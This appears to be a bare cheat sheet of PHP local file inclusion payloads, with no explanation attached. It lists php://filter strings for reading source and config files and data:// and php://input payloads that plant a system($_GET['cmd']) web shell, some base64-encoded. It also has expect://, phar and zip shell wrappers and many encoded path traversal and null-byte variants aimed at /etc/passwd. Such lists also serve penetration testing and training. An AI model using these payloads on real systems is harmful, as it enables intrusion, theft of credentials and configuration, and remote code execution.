# PHP wrappers

# Base64 encode source code
php://filter/convert.base64-encode/resource=index.php
php://filter/convert.base64-encode/resource=config.php
php://filter/convert.base64-encode/resource=../config.php
php://filter/read=convert.base64-encode/resource=index.php

# Other encodings
php://filter/convert.iconv.utf-8.utf-16/resource=index.php
php://filter/convert.quoted-printable-encode/resource=index.php
php://filter/string.rot13/resource=index.php
php://filter/zlib.deflate/resource=index.php

# RCE via php://input (POST data as PHP code)
php://input
# Then POST: <?php system($_GET['cmd']); ?>

# RCE via data://
data://text/plain,<?php system($_GET['cmd']); ?>
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==

# Expect wrapper (if enabled)
expect://id
expect://whoami

# Phar wrapper (requires phar file upload)
phar://uploads/shell.phar/test.txt

# Zip wrapper (requires zip file upload)
zip://uploads/shell.zip%23shell.php

# File protocol
file:///etc/passwd
file://localhost/etc/passwd

# Path traversal variations
....//....//....//etc/passwd
..%2f..%2f..%2fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
..%252f..%252f..%252fetc/passwd
..%c0%af..%c0%af..%c0%afetc/passwd
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8fetc/passwd
....\/....\/....\/etc/passwd

# Null byte (old PHP versions)
/etc/passwd%00
/etc/passwd%00.php
/etc/passwd%00.jpg
